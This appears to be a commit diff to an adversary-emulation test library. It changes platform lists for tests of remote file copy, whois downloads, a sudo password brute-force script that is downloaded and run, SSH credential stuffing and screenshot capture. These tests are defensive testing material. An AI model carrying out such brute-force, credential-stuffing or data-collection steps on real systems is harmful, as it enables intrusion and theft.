**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 0fc6e977-cb12-44f6-b263-2824ba917409
@@ -120,7 +120,7 @@ if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi
## Atomic Test #2 - rsync remote file copy (pull)
Utilize rsync to perform a remote file copy (pull)
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 3180f7d5-52c0-4493-9ea0-e3431a84773f
@@ -168,7 +168,7 @@ if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi
## Atomic Test #3 - scp remote file copy (push)
Utilize scp to perform a remote file copy (push)
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 83a49600-222b-4866-80a0-37736ad29344
@@ -204,7 +204,7 @@ scp #{local_file} #{username}@#{remote_host}:#{remote_path}
## Atomic Test #4 - scp remote file copy (pull)
Utilize scp to perform a remote file copy (pull)
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** b9d22b9a-9778-4426-abf0-568ea64e9c33
@@ -240,7 +240,7 @@ scp #{username}@#{remote_host}:#{remote_file} #{local_path}
## Atomic Test #5 - sftp remote file copy (push)
Utilize sftp to perform a remote file copy (push)
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** f564c297-7978-4aa9-b37a-d90477feea4e
@@ -276,7 +276,7 @@ sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
## Atomic Test #6 - sftp remote file copy (pull)
Utilize sftp to perform a remote file copy (pull)
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 0139dba1-f391-405e-a4f5-f3989f2c88ef
@@ -597,7 +597,7 @@ Echo "A version of Windows Defender with MpCmdRun.exe must be installed manually
## Atomic Test #14 - whois file download
Download a remote file using the whois utility
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** c99a829f-0bb8-4187-b2c6-d47d1df74cab
-7
View File
@@ -6,7 +6,6 @@ atomic_tests:
description: |
Utilize rsync to perform a remote file copy (push)
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -44,7 +43,6 @@ atomic_tests:
description: |
Utilize rsync to perform a remote file copy (pull)
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -81,7 +79,6 @@ atomic_tests:
description: |
Utilize scp to perform a remote file copy (push)
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -110,7 +107,6 @@ atomic_tests:
description: |
Utilize scp to perform a remote file copy (pull)
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -139,7 +135,6 @@ atomic_tests:
description: |
Utilize sftp to perform a remote file copy (push)
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -168,7 +163,6 @@ atomic_tests:
description: |
Utilize sftp to perform a remote file copy (pull)
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -359,7 +353,6 @@ atomic_tests:
description: |
Download a remote file using the whois utility
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
+1 -1
View File
@@ -379,7 +379,7 @@ An adversary may find themselves on a box (e.g. via ssh key auth, with no passwo
This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** abcde488-e083-4ee7-bc85-a5684edd7541
+1 -1
View File
@@ -234,7 +234,7 @@ atomic_tests:
This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
supported_platforms:
- freebsd
- linux
input_arguments:
remote_url:
description: url of remote payload
+1 -1
View File
@@ -130,7 +130,7 @@ brew install hudochenkov/sshpass/sshpass
## Atomic Test #3 - SSH Credential Stuffing From FreeBSD
Using username,password combination from a password dump to login over SSH.
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** a790d50e-7ebf-48de-8daa-d9367e0911d4
+1 -1
View File
@@ -69,7 +69,7 @@ atomic_tests:
Using username,password combination from a password dump to login over SSH.
supported_platforms:
- freebsd
- linux
input_arguments:
target_host:
+2 -2
View File
@@ -153,7 +153,7 @@ sudo #{package_installer}
## Atomic Test #4 - X Windows Capture (freebsd)
Use xwd command to collect a full desktop screenshot and review file with xwud
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 562f3bc2-74e8-46c5-95c7-0e01f9ccc65c
@@ -253,7 +253,7 @@ sudo apt install graphicsmagick-imagemagick-compat
## Atomic Test #6 - Capture Linux Desktop using Import Tool (freebsd)
Use import command from ImageMagick to collect a full desktop screenshot
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 18397d87-38aa-4443-a098-8a48a8ca5d8d
+2 -2
View File
@@ -74,7 +74,7 @@ atomic_tests:
description: |
Use xwd command to collect a full desktop screenshot and review file with xwud
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
description: Output file path
@@ -126,7 +126,7 @@ atomic_tests:
description: |
Use import command from ImageMagick to collect a full desktop screenshot
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
description: Output file path
+1 -1
View File
@@ -88,7 +88,7 @@ Get-Date
## Atomic Test #3 - System Time Discovery in FreeBSD/macOS
Identify system time. Upon execution, the local computer system time and timezone will be displayed.
**Supported Platforms:** Freebsd, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** f449c933-0891-407f-821e-7916a21a1a6f

Some files were not shown because too many files have changed in this diff Show More